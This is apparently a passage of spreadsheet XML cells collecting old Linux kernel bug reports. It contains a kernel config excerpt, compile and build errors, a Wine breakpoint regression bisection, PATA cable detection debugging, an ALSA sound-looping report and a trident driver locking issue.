CONFIG_USB_ACM is not set # CONFIG_USB_PRINTER is not set # # NOTE: USB_STORAGE enables SCSI, and 'SCSI disk support' # # # may also be needed; see USB_STORAGE Help for more information # CONFIG_USB_STORAGE=m # CONFIG_USB_STORAGE_DEBUG is not set # CONFIG_USB_STORAGE_DATAFAB is not set # CONFIG_USB_STORAGE_FREECOM is not set # CONFIG_USB_STORAGE_ISD200 is not set # CONFIG_USB_STORAGE_DPCM is not set # CONFIG_USB_STORAGE_USBAT is not set # CONFIG_USB_STORAGE_SDDR09 is not set # CONFIG_USB_STORAGE_SDDR55 is not set # CONFIG_USB_STORAGE_JUMPSHOT is not set # CONFIG_USB_STORAGE_ALAUDA is not set # CONFIG_USB_LIBUSUAL is not set # # USB Input Devices # # CONFIG_USB_HID is not set # # USB HID Boot Protocol drivers # # CONFIG_USB_KBD is not set # CONFIG_USB_MOUSE is not set # CONFIG_USB_AIPTEK is not set # CONFIG_USB_WACOM is not set # CONFIG_USB_ACECAD is not set # CONFIG_USB_KBTAB is not set # CONFIG_USB_POWERMATE is not set # CONFIG_USB_TOUCHSCREEN is not set # CONFIG_USB_YEALINK is not set # CONFIG_USB_XPAD is not set # CONFIG_USB_ATI_REMOTE is not set # CONFIG_USB_ATI_REMOTE2 is not set # CONFIG_USB_KEYSPAN_REMOTE is not set # CONFIG_USB_APPLETOUCH is not set # # USB Imaging devices # # CONFIG_USB_MDC800 is not set # CONFIG_USB_MICROTEK is not set # # USB Network Adapters # # CONFIG_USB_CATC is not set # CONFIG_USB_KAWETH is not set # CONFIG_USB_PEGASUS is not set # CONFIG_USB_RTL8150 is not set # CONFIG_USB_USBNET is not set CONFIG_USB_MON=y # # USB port drivers # # CONFIG_USB_USS720 is not set # # USB Serial Converter support # CONFIG_USB_SERIAL=m # CONFIG_USB_SERIAL_GENERIC is not set # CONFIG_USB_SERIAL_AIRPRIME is not set # CONFIG_USB_SERIAL_ARK3116 is not set # CONFIG_USB_SERIAL_BELKIN is not set # CONFIG_USB_SERIAL_WHITEHEAT is not set # CONFIG_USB_SERIAL_DIGI_ACCELEPORT is not set # CONFIG_USB_SERIAL_CP2101 is not set # CONFIG_USB_SERIAL_CYPRESS_M8 is not set # CONFIG_USB_SERIAL_EMPEG is not set # CONFIG_USB_SERIAL_FTDI_SIO is not set # CONFIG_USB_SERIAL_FUNSOFT is not set # CONFIG_USB_SERIAL_VISOR is not set # CONFIG_USB_SERIAL_IPAQ is not set # CONFIG_USB_SERIAL_IR is not set # CONFIG_USB_SERIAL_EDGEPORT is not set # CONFIG_USB_SERIAL_EDGEPORT_TI is not set # CONFIG_USB_SERIAL_GARMIN is not set # CONFIG_USB_SERIAL_IPW is not set # CONFIG_USB_SERIAL_KEYSPAN_PDA is not set # CONFIG_USB_SERIAL_KEYSPAN is not set # CONFIG_USB_SERIAL_KLSI is not set # CONFIG_USB_SERIAL_KOBIL_SCT is not set # CONFIG_USB_SERIAL_MCT_U232 is not set # CONFIG_USB_SERIAL_NAVMAN is not set CONFIG_USB_SERIAL_PL2303=m # CONFIG_USB_SERIAL_HP4X is not set # CONFIG_USB_SERIAL_SAFE is not set # CONFIG_USB_SERIAL_SIERRAWIRELESS is not set # CONFIG_USB_SERIAL_TI is not set # CONFIG_USB_SERIAL_CYBERJACK is not set # CONFIG_USB_SERIAL_XIRCOM is not set # CONFIG_USB_SERIAL_OPTION is not set # CONFIG_USB_SERIAL_OMNINET is not set # # USB Miscellaneous drivers # # CONFIG_USB_EMI62 is not set # CONFIG_USB_EMI26 is not set # CONFIG_USB_AUERSWALD is not set # CONFIG_USB_RIO500 is not set # CONFIG_USB_LEGOTOWER is not set # CONFIG_USB_LCD is not set # CONFIG_USB_LED is not set # CONFIG_USB_CYPRESS_CY7C63 is not set # CONFIG_USB_CYTHERM is not set # CONFIG_USB_PHIDGETKIT is not set # CONFIG_USB_PHIDGETSERVO is not set # CONFIG_USB_IDMOUSE is not set # CONFIG_USB_APPLEDISPLAY is not set # CONFIG_USB_SISUSBVGA is not set # CONFIG_USB_LD is not set # CONFIG_USB_TEST is not set # # USB DSL modem support # # # USB Gadget Support # # CONFIG_USB_GADGET is not set # # MMC/SD Card support # # CONFIG_MMC is not set # # LED devices # CONFIG_NEW_LEDS=y CONFIG_LEDS_CLASS=y # # LED drivers # # # LED Triggers # CONFIG_LEDS_TRIGGERS=y CONFIG_LEDS_TRIGGER_TIMER=m CONFIG_LEDS_TRIGGER_IDE_DISK=y # CONFIG_LEDS_TRIGGER_HEARTBEAT is not set # # InfiniBand support # # CONFIG_INFINIBAND is not set # # EDAC - error detection and reporting (RAS) (EXPERIMENTAL) # # CONFIG_EDAC is not set # # Real Time Clock # CONFIG_RTC_LIB=m CONFIG_RTC_CLASS=m # # RTC interfaces # CONFIG_RTC_INTF_SYSFS=m CONFIG_RTC_INTF_PROC=m CONFIG_RTC_INTF_DEV=m # CONFIG_RTC_INTF_DEV_UIE_EMUL is not set # # RTC drivers # # CONFIG_RTC_DRV_X1205 is not set # CONFIG_RTC_DRV_DS1307 is not set # CONFIG_RTC_DRV_DS1553 is not set # CONFIG_RTC_DRV_ISL1208 is not set # CONFIG_RTC_DRV_DS1672 is not set # CONFIG_RTC_DRV_DS1742 is no</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Exact Kernel version: 2.5.47 Distribution: Redhat 8.0 Hardware Environment: P3 750, 768MB RAM Software Environment: GCC 3.2.7 Problem Description: Compile of the kernel with Intermezzo selected results in: gcc -Wp,-MD,fs/intermezzo/.cache.o.d -D__KERNEL__ -Iinclude -Wall -Wstrict-prototypes -Wno-trigraphs -O2 -fomit-frame-pointer -fno-strict-aliasing -fno-common -pipe -mpreferred-stack-boundary=2 -march=i686 -Iarch/i386/mach-generic -nostdinc -iwithprefix include -DMODULE -include include/linux/modversions.h -DKBUILD_BASENAME=cache -c -o fs/intermezzo/cache.o fs/intermezzo/cache.c In file included from fs/intermezzo/cache.c:42: include/linux/intermezzo_fs.h:30:34: linux/intermezzo_lib.h: No such file or directory include/linux/intermezzo_fs.h:31:34: linux/intermezzo_idl.h: No such file or directory In file included from fs/intermezzo/cache.c:42: include/linux/intermezzo_fs.h:49: field `remote_version' has incomplete type include/linux/intermezzo_fs.h:52: warning: `struct izo_ioctl_data' declared inside parameter list include/linux/intermezzo_fs.h:52: warning: its scope is only this definition or declaration, which is probably not what you want In file included from fs/intermezzo/cache.c:42: include/linux/intermezzo_fs.h:399: field `fd_version' has incomplete type include/linux/intermezzo_fs.h:645: warning: `struct izo_rcvd_rec' declared inside parameter list include/linux/intermezzo_fs.h:648: warning: `struct izo_upcall_hdr' declared inside parameter list include/linux/intermezzo_fs.h:652: warning: `struct izo_rcvd_rec' declared inside parameter list include/linux/intermezzo_fs.h:654: warning: `struct izo_rcvd_rec' declared inside parameter list include/linux/intermezzo_fs.h:655: warning: `struct izo_rcvd_rec' declared inside parameter list include/linux/intermezzo_fs.h: In function `izo_ioctl_getdata': include/linux/intermezzo_fs.h:727: dereferencing pointer to incomplete type include/linux/intermezzo_fs.h:733: dereferencing pointer to incomplete type include/linux/intermezzo_fs.h:733: `IZO_IOCTL_VERSION' undeclared (first use in this function) include/linux/intermezzo_fs.h:733: (Each undeclared identifier is reported only once include/linux/intermezzo_fs.h:733: for each function it appears in.) include/linux/intermezzo_fs.h:738: dereferencing pointer to incomplete type include/linux/intermezzo_fs.h:743: dereferencing pointer to incomplete type include/linux/intermezzo_fs.h:743: sizeof applied to an incomplete type include/linux/intermezzo_fs.h:748: dereferencing pointer to incomplete type include/linux/intermezzo_fs.h:754: warning: passing arg 1 of `izo_ioctl_is_invalid' from incompatible pointer type include/linux/intermezzo_fs.h:759: dereferencing pointer to incomplete type include/linux/intermezzo_fs.h:760: dereferencing pointer to incomplete type include/linux/intermezzo_fs.h:760: dereferencing pointer to incomplete type include/linux/intermezzo_fs.h:763: dereferencing pointer to incomplete type include/linux/intermezzo_fs.h:764: dereferencing pointer to incomplete type include/linux/intermezzo_fs.h:764: dereferencing pointer to incomplete type include/linux/intermezzo_fs.h:765: warning: implicit declaration of function `size_round' include/linux/intermezzo_fs.h:765: dereferencing pointer to incomplete type In file included from fs/intermezzo/cache.c:42: include/linux/intermezzo_fs.h: At top level: include/linux/intermezzo_fs.h:777: warning: `struct izo_ioctl_data' declared inside parameter list include/linux/intermezzo_fs.h:778: warning: `struct izo_ioctl_data' declared inside parameter list include/linux/intermezzo_fs.h:779: warning: `struct izo_ioctl_data' declared inside parameter list include/linux/intermezzo_fs.h:862: warning: `struct izo_ioctl_data' declared inside parameter list include/linux/intermezzo_fs.h: In function `izo_ioctl_packlen': include/linux/intermezzo_fs.h:864: sizeof applied to an incomplete type include/linux/intermezzo_fs.h:865: dereferencing pointer to incomplete type include/linux/intermezzo_fs.h:866: dereferencing pointer to incomplete type include/linux/intermezzo_fs.h: At top level: include/linux/intermezzo_fs.h:870: warning: `struct izo_ioctl_data' declared inside parameter list include/linux/intermezzo_fs.h:871: conflicting types for `izo_ioctl_is_invalid' include/linux/intermezzo_fs.h:52: previous declaration of `izo_ioctl_is_invalid'include/linux/intermezzo_fs.h: In function `izo_ioctl_is_invalid': include/linux/intermezzo_fs.h:872: dereferencing pointer to incomplete type include/linux/intermezzo_fs.h:876: dereferencing pointer to incomplete type include/linux/intermezzo_fs.h:880: dereferencing pointer to incomplete type include/linux/intermezzo_fs.h:884: dereferencing pointer to incomplete type include/linux/intermezzo_fs.h:884: dereferencing pointer to incomplete type include/linux/intermezzo_fs.h:888: dereferencing pointer to incomplete type include/linux/intermezzo_fs.h:888: dereferencing pointer to incomplete type include/linux/intermezzo_fs.h:892: dereferencing pointer to incomplete type include/linux/intermezzo_fs.h:892: dereferencing pointer to incomplete type include/linux/intermezzo_fs.h:896: dereferencing pointer to incomplete type include/linux/intermezzo_fs.h:896: dereferencing pointer to incomplete type include/linux/intermezzo_fs.h:900: warning: passing arg 1 of `izo_ioctl_packlen' from incompatible pointer type include/linux/intermezzo_fs.h:900: dereferencing pointer to incomplete type include/linux/intermezzo_fs.h:904: dereferencing pointer to incomplete type include/linux/intermezzo_fs.h:905: dereferencing pointer to incomplete type include/linux/intermezzo_fs.h:905: dereferencing pointer to incomplete type include/linux/intermezzo_fs.h:909: dereferencing pointer to incomplete type include/linux/intermezzo_fs.h:910: dereferencing pointer to incomplete type include/linux/intermezzo_fs.h:910: dereferencing pointer to incomplete type include/linux/intermezzo_fs.h:910: dereferencing pointer to incomplete type In file included from fs/intermezzo/cache.c:42: include/linux/intermezzo_fs.h: At top level: include/linux/intermezzo_fs.h:919: warning: `struct kml_rec' declared inside parameter list include/linux/intermezzo_fs.h:920: warning: `struct kml_rec' declared inside parameter list make[2]: *** [fs/intermezzo/cache.o] Error 1 make[1]: *** [fs/intermezzo] Error 2 make: *** [fs] Error 2</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: 2.6.22-rc1 Distribution: Gentoo Linux, kernel vanilla-sources Portage 2.1.2.7 (default-linux/amd64/2006.1/desktop, gcc-4.1.1, glibc-2.5-r2, 2.6.22-rc1-auriga x86_64) ================================================================= System uname: 2.6.22-rc1-auriga x86_64 AMD Turion(tm) 64 X2 Mobile Technology TL-56 Gentoo Base System release 1.12.9 Timestamp of tree: Sun, 20 May 2007 13:20:01 +0000 dev-java/java-config: 1.3.7, 2.0.31-r5 dev-lang/python: 2.4.4-r4 dev-python/pycrypto: 2.0.1-r5 sys-apps/sandbox: 1.2.17 sys-devel/autoconf: 2.13, 2.61 sys-devel/automake: 1.4_p6, 1.5, 1.6.3, 1.7.9-r1, 1.8.5-r3, 1.9.6-r2, 1.10 sys-devel/binutils: 2.16.1-r3 sys-devel/gcc-config: 1.3.16 sys-devel/libtool: 1.5.22 virtual/os-headers: 2.6.17-r2 Problem Description: When building the 2.6.22-rc2 kernel and modules, the following message appears: MODPOST vmlinux WARNING: arch/x86_64/kernel/built-in.o - Section mismatch: reference to .init.text: from .text between 'get_mtrr_state' (at offset 0xda81) and 'generic_set_mtrr' WARNING: arch/x86_64/kernel/built-in.o - Section mismatch: reference to .init.text: from .text between 'get_mtrr_state' (at offset 0xdaa1) and 'generic_set_mtrr' WARNING: arch/x86_64/kernel/built-in.o - Section mismatch: reference to .init.text: from .text between 'get_mtrr_state' (at offset 0xdad0) and 'generic_set_mtrr' The .config is on its way.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>There is a regression between 2.6.35 and 2.6.36 for 32bit Wine in the Wine test checking the single stepping over hardware breakpoints: /home/michi/work/wine/tools/runtest -q -P wine -M ntdll.dll -T ../../.. -p ntdll_test.exe.so /home/michi/work/wine/dlls/ntdll/tests/exception.c &amp;&amp; touch exception.ok exception.c:585: Test failed: eip is wrong: 340002 instead of 340001 exception.c:587: Test failed: B0 flag is not set in Dr6 exception.c:588: Test failed: BS flag is set in Dr6 exception.c:593: Test failed: eip is wrong: 7ed569d3 instead of 340002 make: *** [exception.ok] Error 4 All those tests are in bpx_handler() http://source.winehq.org/git/wine.git/?a=blob;f=dlls/ntdll/tests/exception.c;h=701b6bba091dddce724075dc41dd2ab407f28ac4;hb=HEAD#l559 A regression test gives: 0c4519e825c9e2b6a8310deff8582f8c35bfbba9 is the first bad commit commit 0c4519e825c9e2b6a8310deff8582f8c35bfbba9 Author: Frederic Weisbecker &lt;fweisbec@gmail.com&gt; Date: Thu Jun 24 21:21:27 2010 +0200 x86: Set resume bit before returning from breakpoint exception Instruction breakpoints trigger before the instruction executes, and returning back from the breakpoint handler brings us again to the instruction that breakpointed. This naturally bring to a breakpoint recursion. To solve this, x86 has the Resume Bit trick. When the cpu flags have the RF flag set, the next instruction won't trigger any instruction breakpoint, and once this instruction is executed, RF is cleared back. This let's us jump back to the instruction that triggered the breakpoint without recursion. Use this when an instruction breakpoint triggers. Signed-off-by: Frederic Weisbecker &lt;fweisbec@gmail.com&gt; Cc: Will Deacon &lt;will.deacon@arm.com&gt; Cc: Prasad &lt;prasad@linux.vnet.ibm.com&gt; Cc: Mahesh Salgaonkar &lt;mahesh@linux.vnet.ibm.com&gt; Cc: Paul Mackerras &lt;paulus@samba.org&gt; Cc: Ingo Molnar &lt;mingo@elte.hu&gt; Cc: Jason Wessel &lt;jason.wessel@windriver.com&gt; :040000 040000 2eae1fa5f90b141d60fe28a971a618e9c0b1a232 e27fd94a1beb10e3688d555bd74c888b6a310293 M arch Reverting this patch on top of 2.6.36 makes the problem go away. The problem is 100% reproducible and I see it in 32bit Wine on both 32bit and 64bit Linux. The regression might affect also 64bit Wine but those exception tests aren't compiled for 64bit Wine due to the lack of compiler support for win64 exceptions; so we cannot test it. Steps to reproduce: ------------------- Any Wine version wine-1.2 or newer will do (either a tarball from http://sourceforge.net/projects/wine/files/Source/ or from git git clone git://source.winehq.org/git/wine.git ./configure make cd dlls/ntdll/tests/ make exception.ok There should be no errors and exception.ok should have been created. For builds on a x86_64 machine a pretty complete 32bit setup is needed too, but configure will complain. If configure doesn't errors out but produces warnings, those can be safely ignored. It means the dependencies are optional and those aren't needed to reproduce this bug. http://wiki.winehq.org/WineOn64bit has a lot more info on setting this up.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>The kernel driver r8169 doesn't work properly, as mentionned in many websites. Pings are lost, connexion gets stuck ... Common suggestion is to install the official realtek driver (from realtek website). Anyway, driver from Realtek compiles with kernel &lt;= 2.6.30-r10 but fails from 2.6.31, due to removal of structure fields from line 871 to 906. People experiencing troubles with the kernel driver are thus stuck in either moving back to 2.6.30.10 or add a new network controler The following links show the removal : rev 2.6.30-10 : http://lxr.linux.no/#linux+v2.6.30.10/include/linux/netdevice.h#L871 rev 2.6.31 : http://lxr.linux.no/#linux+v2.6.31/include/linux/netdevice.h#L871 The errors are : make -C src/ modules make[1]: Entering directory `/usr/src/r8169-6.011.00/src' make -C /lib/modules/2.6.31-gentoo-r6/build SUBDIRS=/usr /src/r8169-6.011.00/src modules make[2]: Entering directory `/usr/src/linux-2.6.31-gentoo-r6' CC [M] /usr/src/r8169-6.011.00/src/r8169_n.o /usr/src/r8169-6.011.00/src/r8169_n.c: In function 'rtl8169_init_one': /usr/src/r8169-6.011.00/src/r8169_n.c:2629: error: 'struct net_device' has no member named 'do_ioctl' /usr/src/r8169-6.011.00/src/r8169_n.c:2639: error: 'struct net_device' has no member named 'open' /usr/src/r8169-6.011.00/src/r8169_n.c:2640: error: 'struct net_device' has no member named 'hard_start_xmit' /usr/src/r8169-6.011.00/src/r8169_n.c:2641: error: 'struct net_device' has no member named 'get_stats' /usr/src/r8169-6.011.00/src/r8169_n.c:2643: error: 'struct net_device' has no member named 'stop' /usr/src/r8169-6.011.00/src/r8169_n.c:2644: error: 'struct net_device' has no member named 'tx_timeout' /usr/src/r8169-6.011.00/src/r8169_n.c:2645: error: 'struct net_device' has no member named 'set_multicast_list' /usr/src/r8169-6.011.00/src/r8169_n.c:2649: error: 'struct net_device' has no member named 'change_mtu' /usr/src/r8169-6.011.00/src/r8169_n.c:2650: error: 'struct net_device' has no member named 'set_mac_address' make[3]: *** [/usr/src/r8169-6.011.00/src/r8169_n.o] Error 1 make[2]: *** [_module_/usr/src/r8169-6.011.00/src] Error 2 make[2]: Leaving directory `/usr/src/linux-2.6.31-gentoo-r6' make[1]: *** [modules] Error 2 make[1]: Leaving directory `/usr/src/r8169-6.011.00/src' make: *** [modules] Error 2 I apologize for my poor english in advance :-/</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Latest working kernel version: n.a. Earliest failing kernel version: n.a. Distribution: Gentoo Hardware Environment: - Motherboard: ASUS M2N-SLI Deluxe - - on-Board: nVidia nForce 570 SLI MCP - - - Primary IDE - Master: PLEXTOR DVD-ROM PX-130A, Firmware 1.03 - - - Primary IDE - Slave : PLEXTOR DVDR PX-760A, Firmware 1.07 Software Environment: n.a. Problem Description: The DVD-ROM "detects" a 40-wire cable only; thus the connection is reduced to UDMA33 Steps to reproduce: boot - dmesg : 'limited to UDMA/33 due to 40-wire cable' I.) First approach: IDE Kernel config: A) device drivers -&gt; ATA/... -&gt; AMD and NVidia support : -- CONFIG_BLK_DEV_AMD74XX=y limits down to UDMA33 due to 40-wire - but works. II.) Second approach: upgrade Firmware from Firmware 1.01 to Firmware 1.03 : no diff. at all III.) Third approach: change to PATA_AMD Kernel config: A) device drivers -&gt; ATA/... -&gt; AMD and NVidia support : -- CONFIG_BLK_DEV_AMD74XX is not set B) device drivers -&gt; Serial ATA and Parallel ATA -&gt; AMD/NVida PATA support : -- CONFIG_PATA_AMD=y still limits down to UDMA33 due to 40-wire - but works: &gt;&gt;&gt; 'limited to UDMA/33 due to 40-wire cable' &lt;&lt;&lt; in /usr/src/linux/drivers/ata/libata-core.c : static void ata_dev_xfermask(struct ata_device *dev) calling static int ata_is_40wire(struct ata_device *dev) calling /usr/src/linux/include/linux/ata.h : static inline int ata_drive_40wire(const u16 *dev_id) { ... if ((dev_id[93] &amp; 0xE000) == 0x6000) return 0; /* 80 wire */ return 1; } but [93] is 0x0000 - for _both_ devices !???! - c.f. hdparm-output below - How the hell then does DVD-RW get it's UDMA66 ?! - cf. below I.) I changed cables to different very short 80-wire ribbon cable: no diff. II.) I soleyly attached DVD-RW to MASTER: still detected as UDMA66. III.) I soleyly attached DVD-ROM to MASTER: still reduced to UDMA33. IV.) Dirty override: I commented the "downgrade" in ata_dev_xfermask(): /* xfer_mask &amp;= ~(0xF8 &lt;&lt; ATA_SHIFT_UDMA); */ and added some DEBUG lines: Still detects ata9.00: ___ MKN ___ : libata-core : ap-&gt;cbl == ATA_CBL_PATA80 ata9.00: ___ MKN ___ : libata-core : ata_is_40wire(dev) but for for DVD-ROM only (!?) it is just ata9.01: ___ MKN ___ : libata-core : ap-&gt;cbl == ATA_CBL_PATA80 for the DVD-RW Works perfectly in the resulting UDMA100+UDMA66 combination, with short 80-wire ribbon cables, as well as even with a really long round 80-wire cable ! Test: Copy a whole big DVD-ROM to SATA-disk &amp;&amp; diff both trees: +identical+ ### ### ### ### ### ### # # Some more information: # ### ### ### ### ### ### $ dmesg ... pata_amd 0000:00:04.0: version 0.3.10 PCI: Setting latency timer of device 0000:00:04.0 to 64 scsi8 : pata_amd scsi9 : pata_amd ata9: PATA max UDMA/133 cmd 0x1f0 ctl 0x3f6 bmdma 0xf000 irq 14 ata10: PATA max UDMA/133 cmd 0x170 ctl 0x376 bmdma 0xf008 irq 15 ata9.00: ATAPI: PLEXTOR DVD-ROM PX-130A, 1.03, max UDMA/100 ata9.01: ATAPI: PLEXTOR DVDR PX-760A, 1.07, max UDMA/66 ata9.00: ___ MKN ___ : libata-core : ap-&gt;cbl == ATA_CBL_PATA80 ata9.00: ___ MKN ___ : libata-core : ata_is_40wire(dev) ata9.00: ___ MKN ___ : libata-core : dirty override _wrong_ 'limited to UDMA/33 due to 40-wire cable' ata9.01: ___ MKN ___ : libata-core : ap-&gt;cbl == ATA_CBL_PATA80 ata9.00: configured for UDMA/100 ata9.01: configured for UDMA/66 ata10: port disabled. ignoring. scsi 8:0:0:0: CD-ROM PLEXTOR DVD-ROM PX-130A 1.03 PQ: 0 ANSI: 5 sr0: scsi3-mmc drive: 0x/50x cd/rw xa/form2 cdda tray Uniform CD-ROM driver Revision: 3.20 sr 8:0:0:0: Attached scsi CD-ROM sr0 sr 8:0:0:0: Attached scsi generic sg4 type 5 scsi 8:0:1:0: CD-ROM PLEXTOR DVDR PX-760A 1.07 PQ: 0 ANSI: 5 sr1: scsi3-mmc drive: 40x/40x writer cd/rw xa/form2 cdda tray sr 8:0:1:0: Attached scsi CD-ROM sr1 sr 8:0:1:0: Attached scsi generic sg5 type 5 ... # hdparm -I /dev/sr0 /dev/sr0: ATAPI CD-ROM, with removable media Model Number: PLEXTOR DVD-ROM PX-130A Serial Number: Firmware Revision: 1.03 Standards: Likely used CD-ROM ATAPI-1 Configuration: DRQ response: 50us. Packet size: 12 bytes Capabilities: LBA, IORDY(can be disabled) Buffer size: 64.0kB DMA: mdma0 mdma1 mdma2 udma0 udma1 udma2 udma3 udma4 *udma5 Cycle time: min=120ns recommended=120ns PIO: pio0 pio1 pio2 pio3 pio4 Cycle time: no flow control=120ns IORDY flow control=120ns Commands/features: Enabled Supported: * Power Management feature set * PACKET command feature set * DEVICE_RESET command # hdparm -I /dev/sr1 /dev/sr1: ATAPI CD-ROM, with removable media Model Number: PLEXTOR DVDR PX-760A Serial Number: 245097 Firmware Revision: 1.07 Standards: Likely used CD-ROM ATAPI-1 Configuration: DRQ response: 50us. Packet size: 12 bytes Capabilities: LBA, IORDY(can be disabled) DMA: mdma0 mdma1 mdma2 udma0 udma1 udma2 udma3 *udma4 Cycle time: min=120ns recommended=120ns PIO: pio0 pio1 pio2 pio3 pio4 Cycle time: no flow control=120ns IORDY flow control=120ns HW reset results: CBLID- above Vih Device num = 1 determined by the jumper # hdparm --Istdout /dev/sr0 /dev/sr0: 85c0 0000 0000 0000 0000 0000 0000 0000 0000 0000 2020 2020 2020 2020 2020 2020 2020 2020 2020 2020 3453 0080 0000 312e 3033 2020 2020 504c 4558 544f 5220 4456 442d 524f 4d20 5058 2d31 3330 4120 2020 2020 2020 2020 2020 2020 2020 2020 0000 0000 0f00 0000 0200 0200 0006 0000 0000 0000 0000 0000 0000 0000 0000 0000 0007 0003 0078 0078 0078 0078 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 &lt;--- 0000 0000 0218 4000 4000 0218 0000 4000 203f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 hdparm --Istdout /dev/sr1 /dev/sr1: 85c0 0000 0000 0000 0000 0000 0000 0000 0000 0000 2020 2020 2020 2020 2020 2020 2020 3234 3530 3937 0000 0000 0000 312e 3037 2020 2020 504c 4558 544f 5220 4456 4452 2020 2050 582d 3736 3041 2020 2020 2020 2020 2020 2020 2020 2020 2020 0000 0000 0f00 0000 0400 0200 0006 0000 0000 0000 0000 0000 0000 0000 0000 0000 0007 0003 0078 0078 0078 0078 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 &lt;--- 0078 0000 0000 0000 0000 0000 0000 0000 101f 0000 0000 0000 0000 6b00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0000 $ emerge --info Portage 2.1.4.4 (default-linux/amd64/2007.0/desktop, gcc-4.2.3, glibc-2.6.1-r0, 2.6.24-gentoo-r3 x86_64) ================================================================= System uname: 2.6.24-gentoo-r3 x86_64 AMD Athlon(tm) 64 X2 Dual Core Processor 5200+ Timestamp of tree: Thu, 06 Mar 2008 04:16:01 +0000 ccache version 2.4 [disabled] app-shells/bash: 3.2_p17-r1 dev-java/java-config: 1.3.7, 2.1.4 dev-lang/python: 2.4.4-r9 dev-python/pycrypto: 2.0.1-r6 dev-util/ccache: 2.4-r7 sys-apps/baselayout: 1.12.11.1 sys-apps/sandbox: 1.2.18.1-r2 sys-devel/autoconf: 2.13, 2.61-r1 sys-devel/automake: 1.4_p6, 1.5, 1.7.9-r1, 1.8.5-r3, 1.9.6-r2, 1.10.1 sys-devel/binutils: 2.18-r1 sys-devel/gcc-config: 1.4.0-r4 sys-devel/libtool: 1.5.26 virtual/os-headers: 2.6.24 ACCEPT_KEYWORDS="amd64" CBUILD="x86_64-pc-linux-gnu" CFLAGS="-march=athlon64 -O2 -pipe -mno-tls-direct-seg-refs " CHOST="x86_64-pc-linux-gnu" ... CXXFLAGS="-march=athlon64 -O2 -pipe -mno-tls-direct-seg-refs " ...</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Distribution: Gentoo Hardware Environment: x86, Abit NF7-S (nforce2) Software Environment: root@gentoo jeff # emerge info Portage 2.0.50-r9 (default-x86-2004.0, gcc-3.3.3, glibc-2.3.3.20040420-r0, 2.6.7) ================================================================= System uname: 2.6.7 i686 AMD Athlon(tm) XP 2500+ Gentoo Base System version 1.4.16 Autoconf: sys-devel/autoconf-2.59-r3 Automake: sys-devel/automake-1.8.3 ACCEPT_KEYWORDS="x86" AUTOCLEAN="yes" CFLAGS="-march=athlon-xp -Os -pipe -m3dnow" CHOST="i686-pc-linux-gnu" COMPILER="gcc3" CXXFLAGS="-march=athlon-xp -Os -pipe -m3dnow" MAKEOPTS="-j2" USE="3dnow X aalib aavm alsa apache2 apm avi berkdb bonobo cdr crypt cups dvd dvdr encode esd evo foomaticdb gb gd gdbm gif gnome gnomedb gpg gphoto2 gpm gtk gtk2 gtkhtml imlib java jpeg ldap libg++ libgda libwww mad mikmod mmx motif moznoirc moznomail mpeg mysql ncurses nls oggvorbis opengl oss pam pda pdflib perl plotutils png ppds python quicktime readline sdl slang spell sse ssl svga tcpd tetex tiff truetype unicode usb x86 xml2 xmms xv xvid zlib" root@gentoo jeff # lspci 0000:00:00.0 Host bridge: nVidia Corporation nForce2 AGP (different version?) (rev a2) 0000:00:00.1 RAM memory: nVidia Corporation nForce2 Memory Controller 1 (rev a2) 0000:00:00.2 RAM memory: nVidia Corporation nForce2 Memory Controller 4 (rev a2) 0000:00:00.3 RAM memory: nVidia Corporation nForce2 Memory Controller 3 (rev a2) 0000:00:00.4 RAM memory: nVidia Corporation nForce2 Memory Controller 2 (rev a2) 0000:00:00.5 RAM memory: nVidia Corporation nForce2 Memory Controller 5 (rev a2) 0000:00:01.0 ISA bridge: nVidia Corporation nForce2 ISA Bridge (rev a3) 0000:00:01.1 SMBus: nVidia Corporation nForce2 SMBus (MCP) (rev a2) 0000:00:02.0 USB Controller: nVidia Corporation nForce2 USB Controller (rev a3) 0000:00:02.1 USB Controller: nVidia Corporation nForce2 USB Controller (rev a3) 0000:00:02.2 USB Controller: nVidia Corporation nForce2 USB Controller (rev a3) 0000:00:04.0 Ethernet controller: nVidia Corporation nForce2 Ethernet Controller (rev a1) 0000:00:05.0 Multimedia audio controller: nVidia Corporation nForce MultiMedia audio [Via VT82C686B] (rev a2) 0000:00:06.0 Multimedia audio controller: nVidia Corporation nForce2 AC97 Audio Controler (MCP) (rev a1) 0000:00:08.0 PCI bridge: nVidia Corporation nForce2 External PCI Bridge (rev a3) 0000:00:09.0 IDE interface: nVidia Corporation nForce2 IDE (rev a2) 0000:00:0d.0 FireWire (IEEE 1394): nVidia Corporation nForce2 FireWire (IEEE 1394) Controller (rev a3) 0000:00:1e.0 PCI bridge: nVidia Corporation nForce2 AGP (rev a2) 0000:01:08.0 Ethernet controller: D-Link System Inc RTL8139 Ethernet (rev 10) 0000:01:0b.0 RAID bus controller: Silicon Image, Inc. (formerly CMD Technology Inc) Silicon Image Serial ATARaid Controller [ CMD/Sil 3112/3112A ] (rev 01) 0000:02:00.0 VGA compatible controller: nVidia Corporation NV17 [GeForce4 MX 440] (rev a3) Problem Description: Sound loops when I try to play an mp3. For example, when I try to play Black Dog, I get "Dow Dow Dow Dow". The first note loops 4 times and then stops. The same thing happens with anything else using alsa. Steps to reproduce: Using a 2.6.7 kernel, (2.6.6 works fine) play audio with xmms or mplayer, or whatever.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>857 /* called with spin lock held */ 858 static int 859 trident_write_voice_regs(struct trident_state *state) But the function is called with lock held in some cases but not always. One violating call chain is: 2699 trident_open -&gt; 2784 trident_set_dac_rate(state, 8000); -&gt; trident_write_voice_regs ====================================== One example that follows the comment is: 2289 spin_lock_irqsave(&amp;state-&gt;card-&gt;lock, flags); 2290 trident_set_dac_rate(state, val); 2291 spin_unlock_irqrestore(&amp;state-&gt;card-&gt;lock, flags); trident_set_dac_rate calls trident_write_voice_regs</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
